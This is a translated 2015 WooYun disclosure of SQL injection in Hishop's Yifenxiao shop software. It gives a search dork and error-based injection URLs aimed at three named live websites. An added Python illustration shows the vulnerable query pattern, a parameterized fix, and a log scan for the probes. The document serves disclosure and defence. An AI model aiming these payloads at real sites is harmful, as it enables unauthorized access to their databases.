
Vulnerability summary

Defect ID: wooyun-2015-0116391

Title: SQL injection in the Hishop 易分销 (Yifenxiao) system

Vendor: Hishop

Author: 路人甲

Submitted: 2015-05-27 11:19

Fix deadline: 2015-07-11 11:20

Disclosed: 2015-07-11 11:20

Vulnerability type: SQL injection

Severity: High

Self-rated Rank: 11

Status: Vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-05-27: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2015-07-11: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

The Hishop 易分销 system, apparently developed by http://www.hishop.com.cn/, contains an injection. There are presumably several versions and it is not yet clear which are affected; I found the injection by chance while browsing a shop and entering a single quote, and when I later saw how many users this system has, I tried a few more.
Google search: inurl:SubCategory.aspx?keywords+minSalePrice
http://127.0.0.1/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%27&brand=27

[Screenshot: 1.jpg]


There are a great many instances; these are only from the first few pages of results:
The ones that do not display the error message (they show a generic runtime error instead) can be tested with an injection tool:

Proof of vulnerability:


http://spt.0351tao.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%20and%20char(@@version)%3E1&brand=27

[Screenshot: 01.jpg]


http://www.nnjt365.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%20and%20char(user)%3E1&brand=27

[Screenshot: 2.jpg]


http://twcz.net//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%20and%20char(@@servername)%3E1&brand=27

[Screenshot: 3.jpg]


Tool test result for a target that does not show error messages:

[Screenshot: 02.jpg]
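As an added illustration (this is not code from the report or from Hishop), the following Python contrasts the concatenation pattern consistent with the error behaviour shown above with an allow-list-plus-parameter version of the same query, and runs that allow-list check over constructed IIS-style log lines to flag TagIds values that are not plain id lists. The table and column names, the log field layout and the expectation that TagIds carries a comma-separated integer list are assumptions.

```python
import re
from urllib.parse import parse_qs

# Assumption: TagIds is meant to carry a comma-separated list of integer tag ids.
TAG_IDS_RE = re.compile(r"[0-9]+(,[0-9]+)*")

def parse_tag_ids(raw):
    """Allow-list check: return the ids as ints, or None if the value is not a pure id list."""
    if not TAG_IDS_RE.fullmatch(raw):
        return None
    return [int(x) for x in raw.split(",")]

def build_query_vulnerable(raw_tag_ids):
    # The pattern consistent with the report: the raw parameter is spliced into the SQL text,
    # so "2 and char(@@version)>1" becomes part of the statement and the server-side error
    # leaks the result. Table and column names are hypothetical.
    return "SELECT ProductId FROM ProductTags WHERE TagId IN (" + raw_tag_ids + ")"

def build_query_safe(raw_tag_ids):
    # Hardened form: reject anything but an id list, then bind every id as a parameter.
    ids = parse_tag_ids(raw_tag_ids)
    if ids is None:
        raise ValueError("TagIds must be a comma-separated list of integers")
    placeholders = ",".join("?" for _ in ids)
    return "SELECT ProductId FROM ProductTags WHERE TagId IN (" + placeholders + ")", ids

# Constructed IIS W3C-style log lines (assumed field order: date time s-ip cs-method
# cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status). Payloads are the report's own.
SAMPLE_LOG = """\
2015-05-27 03:19:01 10.0.0.5 GET /SubCategory.aspx keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 80 - 203.0.113.7 200
2015-05-27 03:19:02 10.0.0.5 GET /SubCategory.aspx keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%27&brand=27 80 - 203.0.113.7 500
2015-05-27 03:19:03 10.0.0.5 GET /SubCategory.aspx keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%20and%20char(@@version)%3E1&brand=27 80 - 203.0.113.7 500
2015-05-27 03:19:04 10.0.0.5 GET /SubCategory.aspx keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2,5,9&brand=27 80 - 198.51.100.3 200
"""

def suspicious_requests(log_text):
    """Flag SubCategory.aspx requests whose decoded TagIds value fails the allow-list check."""
    hits = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 10 or not f[4].lower().endswith("/subcategory.aspx"):
            continue
        params = parse_qs(f[5], keep_blank_values=True)  # decodes %27, %20, %3E
        for raw in params.get("TagIds", []):
            if parse_tag_ids(raw) is None:
                hits.append((f[8], int(f[9]), raw))  # (client ip, HTTP status, decoded value)
    return hits
```

The same allow-list check applied server-side, followed by parameter binding, is the fix; the log scan is only a retroactive way to spot the probes shown in the proof above.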

Fix recommendation:

Copyright notice: when reposting, please credit the source, 路人甲@乌云


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined the report

